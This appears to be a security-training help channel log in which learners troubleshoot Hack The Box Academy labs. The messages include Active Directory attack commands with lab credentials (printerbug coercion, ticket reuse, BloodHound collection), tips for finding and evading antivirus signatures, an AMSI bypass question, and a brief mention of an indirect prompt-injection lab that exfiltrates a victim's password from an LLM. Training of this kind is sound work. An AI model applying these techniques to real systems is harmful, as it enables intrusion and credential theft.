im doing attacking common application module and i cant use droopescan. can anyone help
'attacking common applications -> attacking thick-clients' is there anyway to save the newly created .jar file to my machine to 'save' my work?
or is that not allowed?
I created a fork of GEF, a modified version of hugsy/gef. I've added various features, such as kernel-related features, qemu-user integration, debugging from outside Docker, more allocator dumper, and so on. Please try it out if you like.
no module named imp
When python presents the error `no module named`, it means that you don't have that library installed; usually tools come with a `requirements.txt` you use to pull the requirements to load it properly
Cool stuff bro, I will try it for sure!
It gives me an error when I try to install the req
well if it gives errors installing the requirements, then the tool won't run
also, isn't it meant to be run with python2.7? at least the one they link to?
file transferring
Okay I'll download 2.7
do it in a virtual environment; https://docs.python.org/3/library/venv.html
sorry not venv, virtualenv https://virtualenv.pypa.io/en/latest/
https://www.python.org/downloads/release/python-2716/ this is the downloads page for 2.7.16 the highest version available pre-EOL
I'm confused and idk what that is tbh
But I'll just download 2.7 and see what's gonna happen
Guys can somebody help me? Doing xss skill assessment, and got this...
everything did correctly, step by step...
(I will answer later, cause have to go to sleep rn. TYSM in advance)
Hey, I doing windows evasion module in that static analysis, dynamic, etc we need to compile the c# code in release mode and x64 architecture but when use the threatcheck tool to scan the threats shows no threats found in the exe but if we do the same for the .dll file it shows the threats.
while googling got a method to publish the program into a single file as app.exe and then ran the same threatcheck tool on the app.exe now it shows the threats present in the exe. i have question over here to solve the challenges we need to first compile it into a single exe then bypass all the threats to get the flag?
just want to ensure that my understanding is correct or not? because in the material nothing like this is mentioned
Its working do try it and keep this in mind
`Main part is compilation, when we compile the program it should be Release build -> architecture (x86,x64). After successful build the file stored in .exe .dll .pdg etc but the payload stays in the .dll file so if we are using Threatcheck tool to check use it on the .dll file.
Another way is storing the executable in a single file for this we need to follow few steps.
Build the program -> Solution explorer -> Right click -> Publish -> Target (Folder) -> Specific Target (Folder) -> Publish location -> Configuration (Release & architecture) -> Deployment mode (Self-contained) -> Target Runtime (win-x64) -> File publish options (Produce single file)
now the project executable stores as .exe and .pdg and if we use the ThreatCheck tool on the exe it will show whether it has bad bytes or No threat.`
Using a virtual environment lessens the risk of fucking things up
I've an issue in "Server-Side JavaScript Injection", whenever I want to put the flag it shows me that it is incorrect.
Can anyone help me with 'Credential Hunting in Network Shares' in Password Attacks? I'm a little bit stuck
i get error: externally-managed-environment
Read the whole message and it tells you what to do
still with --break-system-packages i cant run the tool
Look for patterns, q1 asks for a domain user, q2 requires the credentials to find an administrator
Well if you installed python2.7 then you'll need to use the command python2.7 droopescan
Sounds like you're missing a requirement then :)
when I try to install the requirements i get an error
python2.7 -m install packagename
"No module named install"
Sorry mistyped
Its -m pip install
Then replace packagename with what you're installing
?
python2.7 -m pip install -r requirements.txt
yeah same
Otherwise it thinks you're trying to install a package literally named requirements.txt
so
alr thx
All I've been doing is googling what you're giving me
@karmic frigate module is above tier 0, please refrain from sharing screenshots from it
Ok but its not something big i just shared a screenshot of a picture of burp from the module to compare expected output and the problem
Its still considered content from the module
yo guys
im on the module 'Attacking Applications Connecting to Services'
im trying to set a breakpoint to reveal the SQL connection credentials
but im getting
```
Cannot insert breakpoint 1.
Cannot access memory at address 0x11b0
```
which is the function call for the connection, and the credentials' address must be stored at some register at this stage, if im not mistaken
im doing this module Server-side Attacks / Exploiting SSRF
so it supposed to give me a dashboard with the admin password but still giving me the answer for Identifying ssrf in past section
because both have the same directory but different outputs for each section
i have reset the target machine multiple times and still the same so no idea why
Hi, I have a quick Q in regards to DACL Attacks II > SPN Jacking - I've been able to capture the last flag, but not via WinRM - is WinRM the intended method / should you be able to grab the flag this way?
in gdb?
try breaking at the function name
if not, break at the address using *0x11b0 in your case
whats the question
Is anyone able to clarify what I may be doing wrong on the "Bypassing Security Filters" for the "Web Attacks" module? ....nevermind sorted it out and am humbled..
Hi, im doing the Password Attacks module, on the pass the ticket (linux) section. Ive made it all the way to the root user but cannot get to reading julio.txt. Ive found the second krb5||cc_64...HRJDux file||, exported it, and then ran ||smbclient //dc01//julio -k -c ls --no-pass|| Still no luck. Any hints for moving forward?
this is a compleeeeeeeete longshot but any chance you remember wht you did to fix it? i am getting the same error
Suggest running klist after you've exported it to ensure it is still valid.
Thank you for the help! That, interestingly was the answer. One of the the tickets did not refresh until i moved it to a different users directory. Appreciate it
What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt windows lateral movement skill assessment
any nudge ? , (ps: i have access as arturo tho)
Make sure you're on the right machine
same protocol ?
cuz i found a lot of non standardized ports tho on that same machine
i got access using one of them
but the desktop is empty
is it me or this module with the binary and web thick client exploit buggy as hell?
https://academy.hackthebox.com/module/113/section/2164
i was working on this yesterday and the new.jar file worked but now today when creating the new.jar file doesnt even want to open up
Yo
ive changed the beans.xml and manifest.mf files while removing the hash files (RSA and SF)
but not sure if i am doing something wrong although following the instructions got me somewhere yesterday
can i dm about the skill assessment question ?
yeah
hello, can i get any help with the skill assessment of the api attacks module? i just have a few questions
OK, I'm very confused (and possibly very frustrated). I'm working on "Exploiting Web Vulnerabilities in Thick-Client Applications". I'm at the point where I'm modifying the binary to download another binary. I've modified the code as per the walk-through and now I have to generate new class files.... My question is "why?" Why am I not just creating an entirely new binary like I did before and go from there?
I generate class files, I over write the old one with the new ones, rebuild again... why am I going through all that work?
what module?
Sorry, 'Attacking Common Applications'
Good evening everyone, currently in my Junior Cybersecurity analyst path and am doing the skills assessment under Network Foundation - Chapter 3 - I keep receiving an "inverse host lookup failed" when I input the following command nc -v <Target IP > <dynamic port> which the last two numbers when I enter passive mode is 194 & 16 - am I entering something wrong here? Any insight would be helpful
@soft moon you still around?
this is a very common friction point for that section. It feels rushed and slapped on with little thought
Really glad you said it and not me.
i don't recall when it was added, but it very much was a big wtf moment from practically everyone
and you're seeing the improved version of that section
I'm sorry, my brain was not prepared for that last part.
No joke, it's causing problems with my learning disability.
It's very frustrating.
I'll muscle through it but it's... tough.
most people weren't prepared for it because you're basically reverse engineering a java application with very little rhyme or reason as to the back and forth
Really glad I'm not the only one. That makes me feel a lot better.
and Java Sucks™
because it's on 6 billion machines /s
(it's a joke, have you seen the java splash screen?)
thankfully not in YEARS
Because you have been given the curse of Ra for decompiling and recompiling Java (against your will)
i am now had to sit down and think
between this section and the binary my progress has crawled painful desk head banging
Cool if I DM you?
sure go for it
i now got the new.jar file to work but now it doesnt want to connect
the next day curse is true
Did you solve it yet?
its at this address in which im getting the error
For Attacking WPA/WPA2 Wi-Fi Networks
Page 13
Attacking EAP-TLS Authentication:
- I cannot find the file nagaw.py in remote machine.
it's in the /opt directory
thank bro
Hi, I learned about module password attacks. I have troubleshot I do not understand the methodology to create a wordlist for cracking. Can someone refer me to some docs or websites to learn some methodology for this ?
still in need of help here
hello!
not quite sure what command you are running in the debugger but this error might be due to you trying to break on the PLT address instead of the function name.
You can send me a DM if you still need help
Do we have asrep roast in attacking AD module?
yes
Currently working on XPath - Blind Exploitation script building. The author mentions "Note: Writing a small script for this task is recommended." I do not get where the "small" part is, I am already at 100 lines of code in python and I still need to add more. Am I missing something?
anyone having issues with Connect to the HTB-Corp WiFi network using the obtained credentials. What is the value of the flag at 192.168.1.1?
Section 11: Enterprise Evil-Twin Attack
I already gotten the first 2 question correct but could not authenticate to the WiFi ... even with wpa_supplicant
You can DM how you're trying to do this. I'll be at my PC shortly.
send the error you are getting, like the output of gdb
can't seem to find the answer for this one can someone tell me what is the correct answer i have tried everything
it's this module
Check DM
Hi! on OWE Transition Mode Evil Twin https://academy.hackthebox.com/module/304/section/3872
I did the exact commands shown in here (and even in the solution provided by gold annual, which are exactly the very same commands) but I only get EAPOL frames, but no POST requests, even when I restart the box, can someone guide me to it ?
Did anyone ever get back to you on this? I'm having the same issue. I've tried on VPN, I've tried on pwnbox. I keep getting the Issue sending URL. I've tested the payload and it catches the credentials. I've tried to paste the URL directly into the address bar to try and bypass the form in the send page too in case that was an issue as well.
To be clear I've tried resetting the pwn box and trying VPN over again checking the payload, checking my php file in the temp server. I've even rage quit a couple of times and come back hours later and even the next day to see if this was an issue with any of the servers maybe, and at this point I don't know what else I could be missing.
Thank you for your time and help with this!
Good evening, I'm working on Introduction to Linux Forensics and I'm stuck with 1 question. I have found all possible answers but none of them are working. Can anybody help me? It would be better to find someone who has already done that.
Hey guys , I am new here need some help with Login Brute Forcing skill assessment 2 , i was able to find the username for ftp but stuck in the password can someone help
For how long are you leaving tcpdump to capture the traffic, or you are not terminating the process at all?
10+ minutes
I just tested the exercise and letting it capture the traffic for 2-4 minutes I was able to see the HTTP traffic inside wireshark
On which VPN server are you doing the exercise?
EU Academy 5
I found the answer but that was kinda absurd
no problem on any other exercises, just this one
Let me test the exercise on eu-5
In the meantime if you would like to test it in parallel you can try on us-academy-4, on which it worked.
sure, let me try
@autumn pilot yes it worked (slowly because US is far from my location) on US-4
yeah, that's the downside of it
from what I can see on the EU region it might be due to the overload at the moment
no worries
yeah
hope we get a middle east server in the future
AD Trust Atks Using Bloodhound-CE
For some reason enum from user in parent domain -> child domain, bloodhound-ce-breaks. I have my /etc/hosts and krb5.conf. I did both with and without extra dot. Yes WS01 is the DC (great naming...). I assume I'm doing something wrong but rusthound-ce did this no problem
rusthound-ce -u htb-student@inlanefreight.ad -p 'HTB_@cademy_stdnt!' -i 172.16.118.20 -f WS01.child.inlanefreight.ad --domain child.inlanefreight.ad -c All --zip
┌──(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad -p 'HTB_@cademy_stdnt!' -d child.inlanefreight.ad. -ns 172.16.118.20 --zip -c All --dns-tcp -dc WS01.child.inlanefreight.ad -v
INFO: BloodHound.py for BloodHound Community Edition
DEBUG: Authentication: username/password
DEBUG: Resolved collection methods: rdp, session, acl, trusts, group, container, objectprops, psremote, localadmin, dcom
DEBUG: Using DNS to retrieve domain information
DEBUG: Querying domain controller information from DNS
DEBUG: Using domain hint: child.inlanefreight.ad.
INFO: Found AD domain: child.inlanefreight.ad
DEBUG: Found primary DC: WS01.child.inlanefreight.ad
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
DEBUG: Found KDC for enumeration domain: WS01.child.inlanefreight.ad
DEBUG: Found KDC for user: DC01.inlanefreight.ad
DEBUG: Using supplied domain controller as KDC
INFO: Getting TGT for user
DEBUG: Trying to connect to KDC at DC01.inlanefreight.ad:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
AD Trust Atks Using Bloodhound-CE (Workaround)
I checked what rusthound was doing, turns out forcing ntlm made this work, so I think it's something weird with DNS + Kerberos (as usual). Of course this won't work in labs where NTLM is disabled, but a temp-fix for now.
┌──(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad -p 'HTB_@cademy_stdnt!' -d logistics.ad. -ns 172.16.118.252 --auth-method ntlm --zip -c All --dns-tcp
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: logistics.ad
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Connecting to GC LDAP server: DC02.logistics.ad
I'm on the windows evasion module, specifically on AMSI bypasses.
I have defender flag the second bypass on behaviour on my own windows box, kicking up a fuss for the fact I am patching AMSI. Is this just a thing now, patching AMSI bad?
Is anyone available to provide a hint on imagebot in the LLM Output Attack Skill Assessment in the AI Red Teamer Path? I'm to the point where I'm performing an injection against a vulnerable function in imagebot. Tried a lot of different things so far but no luck.
Can anyone help with the LLM Output Attacks > Exfiltration Attacks 2 question, where my indirect prompt injection is failing to prompt LLM output with the victim's history. Even though I've successfully hosted the payload, the methodology only returns generic assistant text instead of exfiltrating the actual password from the victim.
Hi! I'm currently working through the "Attacking Common Applications" module from the CPTS path and got kinda confused in the "Attacking CGI Applications - Shellshock" section. How comes that we inject the payload into the User Agent string? This came a little random for me. Also I didn't really understand when the payload is executed. In the subsection "Shellshock via CGI" it says "The function does nothing but returns an exit code 0, but when it is imported, it will execute the command ...". When or where is the function imported?
@cloud urchin can i dm about the windows lateral movement skill assessment ?
it's about the wsus abuse using ||rossy||
Its imported via the User Agent, its exploiting a sanitization flaw that allows for arbitrary code execution
is it normal to get an error like this !!! ?
btw am using powershell with domain joined user tho
I understood that part - my question was more what happens with the user agent on the server side? If I'm not mistaken, its value must be used as an environment variable to be able to abuse the Shellshock vulnerability. What would this typically be used for under normal circumstances?
UserAgents are just whom is sending the request; browsers have theirs, curl uses its own by default
Its just a flaw in how the user-agent was being processed. You're not likely to run into Shellshock in a modern system
Yes that's correct but does not really answer my question. the question is how exactly is it processed to trigger the vulnerability
It's not sanitized properly, meaning that you can manipulate it to send arbitrary commands
In a web application, for instance, it might check for ../ in a regex, and replace it, but only does it once
Or replace things in uploaded files
I.e. a. Php file you upload may have the <,> characters replaced
Or insert a # at the start of the line
any1 available to give me a hand exfiltrating a file in the PDF injection lab of Injection Attacks?
Hey guys, what's up?
Someone can help me in Password Attack module? i'm currently in "pass the certificate", trying to get the Administrator access by "AD CS NTLM Relay Attack (ESC8)"
Well, i tried what the htb say about that, but the printerbug returns error to me
check it out
┌──(kali㉿kali)-[~/HTB/krbrelayx]
└─$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 10.10.14.124
INFO: Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
INFO: Attempting to trigger authentication via rprn RPC at 10.129.234.174
INFO: Bind OK
INFO: Got handle
The NETBIOS connection with the remote host timed out.
INFO: Triggered RPC backconnect, this may or may not have worked
CRITICAL: An unhandled exception has occured. Trying next host:
CRITICAL: Error occurs while reading from remote(104)
well.. after that, i tried a scan using Certipy and found that HTTP is not enabled in the machine
┌──(Certipy)─(kali㉿kali)-[~/HTB/Certipy]
└─$ cat 20260203173356_Certipy.txt
Certificate Authorities
0
CA Name : inlanefreight-CA01-CA
DNS Name : CA01.inlanefreight.local
Certificate Subject : CN=inlanefreight-CA01-CA, DC=inlanefreight, DC=local
Certificate Serial Number : 75ADD4AAC656AE874ABB2F4016102CF1
Certificate Validity Start : 2025-04-28 17:01:06+00:00
Certificate Validity End : 2035-04-28 17:11:05+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates : [!] Could not find any certificate templates
so... what i do wrong?
this is suppose to be not vulnerable by ESC8, right?
anyone here for the skill assessment of (windows lateral movement)
wsus is not wsusing anymore xD
Hello all -- I am just cleaning up some missed cubes and went back to the 'Getting Started' module to do the 'public exploits' section. I was able to enumerate, find the exploit, find a public exploit to throw at it and successfully got the flag but during this I was also trying to figure out developing and understanding the exploit for myself. I understand that there is a vulnerable module which downloads the target file but I am lost on how to actually find the filepath in the first place. The exploit I found just iterated through ../, ../../, etc. until it found the file but that only works if the file is somewhere in the modules current folder hierarchy. Additionally, what would have been my command line alternative to trigger the file download of the vulnerable module; the exploit used a python requests.get but when I put in the same URL in a curl request I get nothing back (although maybe I am not iterating enough parent folders?). Any advice appreciated. I am trying my best to never use MSF
Trust Account Kerberos vs NTLM?
Can anyone explain why I need a TGT for the trust account for this?
┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq impacket-getTGT 'megacorp.ad/logistics$' -hashes :<SNIP>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in logistics$.ccache
┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' -H <SNIP>
SMB 224.0.0.1 445 DC03 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 224.0.0.1 445 DC03 [-] MEGACORP.AD\logistics$:<SNIP> STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT
┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' --use-kcache
SMB megacorp.ad 445 DC03 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB megacorp.ad 445 DC03 [+] MEGACORP.AD\logistics$ from ccache
Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.
You can dm me if you still have trouble with that
Follow the module on gettgtpkinit if you already capture the certificate. after u get the ticket and cannot dump hash with impacket dump like the module showcase which is what happen to me, then try with netexec
Trust accounts cant auth with ntlm or do interactive logins
has anyone had problems in the bloodhound module - analyzing bloodhound data where in community edition it shows 0 sessions?
No its fine . It was right infront of me
Any help with the API Attacks skill assessment? Can i DM someone?
long shot type of question,but has anyone around here used HTB Academy to prepare for CREST certifications?
Hi guys. I'm trying to do the web archive excercise on the information gathering module but It's not working. I keep clicking on the specified date but it shows me another, is this part of the exercise or is it just my internet?
module Information security foundation sub module Windows security and the section is windows security (got the same name ) question is Find the SID of the bob.smith user. and my answer is S-1-5-21-2614195641-1726409526-3792725429-1003
now i have tried removing those "--" did not work i remove the S
did not work
I only can get the certificate of jpinkman, by shadow credentials.
with ESC8, there's no way to get the certificate :/
i cannot get the administrator certificate by shadow credentials bc there's no permission to do that
Actually, i cannot hit the web page in my browser btw
Which module and section are you working on?
.
I can't find a module called Information Security Foundation
That is the name of the path
name of the module
A path is a collection of modules
sorry it is a path my bad
hello, please in File Inclusion - Remote File Inclusion (RFI) (/module/23/section/254)
the target spawn without a port and I am unable to reach it.
You need to download your VPN profile and use it to connect to the VPN so you can reach the target
Also, try using curl or nmap to verify if the web application is running (on port 80 presumably)
So I did this in /etc/hosts : 10.129.27.170 app.inlanefreight.local
10.129.27.170 dev.inlanefreight.local
using curl with this curl -I http://app.inlanefreight.local
curl: (7) Failed to connect to app.inlanefreight.local port 80 after 3219 ms: Could not connect to server
curl -I http://dev.inlanefreight.local
curl: (7) Failed to connect to dev.inlanefreight.local port 80 after 3251 ms: Could not connect to server
wafw00f http://app.inlanefreight.local got this back: RROR:wafw00f:Something went wrong HTTPConnectionPool(host='app.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f8cd5d80590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site app.inlanefreight.local appears to be down
then this: wafw00f http://dev.inlanefreight.local got this: ERROR:wafw00f:Something went wrong HTTPConnectionPool(host='dev.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff39fcd0590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site dev.inlanefreight.local appears to be down
went to this: nikto -h http://app.inlanefreight.local
- Nikto v2.5.0
- 0 host(s) tested
Same came out for dev. What did I do wrong? I followed the steps, but it still didn't work. Can someone please point this old dog to the kibble bowl of 'why'?
Hello! Is it possible that there is an issue with target spawning in https://academy.hackthebox.com/module/35/section/223 ?
I want to do the exercise to complete the section but the target does not spawn.
Any help?
Hello, I have also been having trouble spawning targets for the past 20 minutes on several modules.
Ah i see! Thanks.
Good to know that its not on my side.
well, I do have VPN, I already completed bunch of modules and previous sections in this module
you can see the tun0 on my screenshot
ok, I downloaded new VPN file and now it works ok!
me too
Think this was an issue last week
seems to be happening again
The windows priv esc module is only for stand alone machine or priv esc in AD as well?
Do we know whether internal HTB team are working on the current issue?
Standalone. Privesc in AD is more covered in Active Directory Enumeration & Attacks
Hey everyone,
I was doing pivoting rpivot sub module, it was easy to get to the needed browser but i cant see any flag on homepage and tried to move to other pages to look for it but cant find it. The one on the homepage doesnt work, it just says || It works! || but istg it doesnt.
are you visiting the internal machines webpage?
yes
for me its ip is || 172.16.5.129 || i checked it running ip a
Sounds correct. The flag should be in the red box where it normally says "It works!"
can you send me the commands you used so far in dms?
its still unresolved
Hi everyone,
I was doing the Skill Assessment for the module "INTRO TO ASSEMBLY LANGUAGE", For the first task. I am able to decode the shellcode and trying to run it using jmp rsp instruction but running into segmentation fault.
I have tried to clear the register rax,rbx,rcx. But the error still remained.
btw if u need help with cwes dm me :)
Hi, I am running through the XSS module, I am currently on the phishing task. I have managed to get it to call back to my php server when I post into index.php. but when I go to put the URL into send it wont take it? any help appreciated (I get the issue sending URL error)
You can DM what you are trying.
Did you get this sorted out?
Stuck on File Upload skill assesment:
Try to exploit the upload form to read the flag found at the root directory "/".
I found the upload dir via ||XXE injection||
and found the allowed content type and extensions
but still couldn't upload a backdoor
I have an issue in a module: https://academy.hackthebox.com/module/296/section/3402
What is the exact OS Version that WinPEAS delivers?
10.0.17763
what is the actual ans, it's always telling me wrong
Are you sure you need a backdoor for that SA? o_O
you can dm me if still need help. Will guide you
Hello. This is the exact command from the module. But it does not work ....
Hi! I'm trying to pass the skill assessment task in the AI Privacy Module. The instance hits an immediate timeout right after submitting the model. Is it related to Docker issues or anything else? I'd appreciate any help, can't do anything with it the whole day
Hi, I'm having issues with the Windows Privilege Escalation - Windows Server module. The RDP connection using rdesktop keeps dropping, and smb_delivery constantly crashes the Meterpreter sessions. Is anyone else experiencing this or has found a solution?
Did you try what the command suggested, specifying the domain?
is there a problem with the machines?
Yes
Should be slowly working again for everyone tho
Welcome to the HTB Status Page
but what happened?
I remember I did a machine yesterday
they asked me the password of ftp so I was brute forcing
maybe I done something wrong
Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.
you can DM me
Hi I'm in the AD enumeration and attacks module and the chapter "Initial enumeration" asks us to xfreerdp to the Linux attack box they've set up. I'm not able to connect to that box. See screenshots.
Hi
you should clean your laptop first
maybe you should shut your mouth and not care about it.
This community is about helping each other with hacking, not about making "fun" of others / hating them...
sometime you have just little bit wait for setup of target system / restart it...
Or:
ip a and look if you see "tun0"
and try ping 10.129.26.51
Thanks. I think I'm good for now. Turns out the other commands in that section don't require gui access, so its enough if I ssh into the box.
oh you are right
sorry grany
@fathom pendant I see HTB is having docker target issues? I'm able to spin up a lab but can't ping it. However i get filtered ports on a nmap scan? Are these issues related?
not staff, don't know
Well you should be.. thanks anyways
i feel that it is me..
like
i was brute forcing something yesterday
i don't know if i did something wrong
sorry
hey guys, I'm trying to work through Kernel Exploits in the Windows Privilege Escalation module. I get down to the section where I'm supposed to replace the maintenanceservice.exe binary with a malicious binary, but it won't copy because access is denied. I cannot open cmd in admin mode.
it appears to be an inability to access the destination folder, because I can copy the file to Desktop, but it won't go from Desktop to the destination
I also cannot do it with the powershell Copy-Item
ok. So I guess my issue there was that I used .\ to run the CVE exe. Now I've gotten past that, but now I'm trying to get the meterpreter session and it's not working...
looking at the msfvenom command I used to generate the exe, it's the correct payload, ip, port... same IP and port that the metasploit is expecting to get.
can I get a nudge on Advanced XSS and CSRF Exploitation - XSS Filter Bypasses
I'm past the filter but my payload errors out with CORS error.
got it. not a fan of a module that teaches you something but not that it might silently fail or how it's different than the other payloads in a pretty major way
CDSA : Guys who know about Windows Event Logs & Finding EVIL path Analyzing Evil With Sysmon & Event Logs module's labs , I did well like content but in eventvwr.exe there are not any id 7 ? What I must do in this case , after all labs action not appearing 7 id
Ive the same issue since ever
U need to switch vpn for us, because they usually have the least load
If it doesn't work either, i try after some hours and it works
Hey, Can anyone help me with the rundll32 from windows evasion module bit stuck followed the entire procedure in the module but not getting the reverse shell?
Request: Help on an HTB academy objective assessment.
So essentially I've gone through the "network foundations" module and am on the O.A for it at the end. I've taken a significant amount of notes on it however, I have no experience using the parrot OS or any OS for that matter. I'm having a hard time understanding the information put in front of me in the OS window. Are there any resources that break down in detail how to read the data in this table and what's actually important?
I can't attach images but essentially my issue is that idk what I'm looking at in the parrot terminal it all seems like randomized data. Yes I can identify IP's but that's where my knowledge of the information ends. Any advice/resources would be greatly appreciated.
Module: Introduction to Windows Evasion Techniques
Section: Process Injection
Question: Write a program that spawns calc.exe and then uses PE injection to grant a reverse shell. Place it in "C:\Alpha\ProcessInjection" and wait up to a minute until a user runs the program. Your goal is to read the contents of flag.txt on the desktop of the user who will execute your program.
I followed everything and literally copy-pasted the code (using micr0_shell payload as stated) and it keeps giving me the thread timeout error in log.txt file.
It says checking for calc.exe..... then thread timeout or something like that.
Tried to even write my own version in C++, also did not work.
Can anyone please help?
Still the same issue, nothing changed. Can anybody help with it and try to submit any model to the target server? Will it be OK?
Still need help? DM me
DM me
Module: Using CrackMapExec
Section: Searching for Accounts in Group Policy Objects
Question: What's the name of the other account present in the GPO?
Executing the -M gpp-password module has been showing timeout for two days now.
Can anyone please help?
Try adding the --dns-timeout 30 and --dns-tcp flags
any help?
Take a look at the PowerShell bit version used in the code and based on that use the specific dll
After many attempts, it still times out. Is there an issue with the environment?
With a little adjustment of the timeouts it ran successfully
Hey guys, i would need some help for the DNS section in the Footprinting module, it's for the last question : What is the FQDN of the host where the last octet ends with "x.x.x.203"? but i don't find any host in 203 and as far as i tried, reverse dns didn't work..
Can someone help me ?
subdomains of subdomains
Use the diagram in the section to build an idea of what you need to enumerate next
In Command Injection - Identify Filters question Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? I'm pretty sure my answer is correct but it keeps saying incorrect answer. The answer is in the question itself new-line, &, |
even using the actual OPERATOR name
I have to brute force each subdomain to find it ???
is not the correct answer
Finally effective, thank you very, very much
well you can skip the one you already enumerated for the other questions. But yes, it won't take that long to actually enumerate
I believe the answer to the question is wrong... or the question is wrong
only one is accepted as the answer, it's a known thing. (check #1234357888114364508 )
With this : for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ? Cause there is a lot of subdomains so if i have to test 110000 for each .. it will be long
the subdomain isn't in the top1million list that you're looking for as sub2.sub1.inlanefreight.htb
yeah yeah, i've already the sub1, but if i have to search any sub2 on all the sub1 it will be long
step 1: dig axfr inlanefreight.htb @ip
step 2: use that as your base list for checking
yeah yeah it's what i'm doing
using one of the tools listed, only one other subdomain will yield results (as in it takes time for it to process)
module is above tier 0; please don't share command output
also as a general strategy for finding the right wordlist: start small go big
i'm using the 32bit version
I see thank you however what do I need to do to get my \n to be valid... I tried encoding it but still invalid
it's just the word
whats %5Cn? that's not what the new-line character is
I used cyberchef and did a url encode on it
Cyberchef is taking the literal string of \n
so it's treating it as 2 characters, not a single control
see: other injection operators section, in the table there "header injection"
|| dnsenum || ? cause if it's that, it's really really long
It just failed ..
it really doesn't take that long, and as I said you're going to need a different wordlist to find the answer; my other hint is less direct about "start small go big" as in start with smaller wordlists then go bigger
it won't fail for every subdomain
I'm trying with the basic domain, just to understand how it works first, and it failed, i'm trying an other wordlist rn
the basic syntax; the example uses inlanefreight.htb at the end, but you can do subdomain.inlanefreight.htb and it will enumerate the subdomain using the dnsserver specified by the --dnsserver flag
okok mb, i missed a letter at the end, i'll try again
i felt that in my core 
patience is a key thing to have in this field
I'm patient but it start to be really really long x)
Ok after a long way, i'm under the sunset
I need to say this: the Environment Enumeration lab in the Linux PrivEsc module is incredibly frustrating and poorly designed.
The section provides zero clues on how to actually find the flag using the methodology taught. None of the commands explained (OS/Kernel version, PATH, etc.) lead you to the solution in a logical way. It feels absurd that the only way to find it is by 'guessing' the flag format and grepping the whole system, or finding an exploit that isn't even mentioned in the text or discoverable via sudo -l (since it requires a password).
It's a poor design for a learning module because it forces you to look for spoilers instead of practicing the enumeration steps you just read. The real exploit exists, but it shouldn't be the focus of an 'Enumeration' section if the text doesn't teach you how to find it first. Has anyone actually solved this using ONLY the methodology provided in the text?
@autumn pilot can i dm you for the rundll32 windows evasion module?
Can I DM someone to get a hint for the Skills Assessment - File Inclusion?
sure
Hey guys, in the SMTP course in the FootPrinting Module, can someone just tell me if i'm the good way cause i'm trying to use wordlists but it's very very long on the HTB's machine, and i don't have the command on my personal terminal. And, the command isn't even present in the course cause footprinting is a really small part in this course so i don't know if i'm on the good way.
For information, i started my first "small" wordlist at 31... that why i don't want to try 10 wordlists if it's more than 10m each
Thx
Spoil of my command, don't look it if you're starting the course ( even if it's possible that it's not the good command at all ) ||smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.129.26.6||
There's a wordlist shared in the Footprinting module, it might be worth a try
Theres a wordlist provided by the module look for a button labeled <resources>
Yeah i saw it, but i didn't find it
just, how could i find the wordlist, i have the name, it is in the hint
No it's ok i download it
May someone know how to install smtp-enum-user ?
Cause it's toooo loonggg on the HTB machine
It should already be installed on Kali by default. You can check here for more info: https://www.kali.org/tools/smtp-user-enum/
sometimes you need to adjust the wait time; SMTP can be very slow, i always mix up if it's -w or -W for wait time
-w n Wait a maximum of n seconds for reply (default: 5)
options are :
-t n Wait a maximum of n seconds for reply (default: 5)
I don't understand cause -t is supposed to be an arg for an ip ?
it srsly doesn't work
it's horrible ..
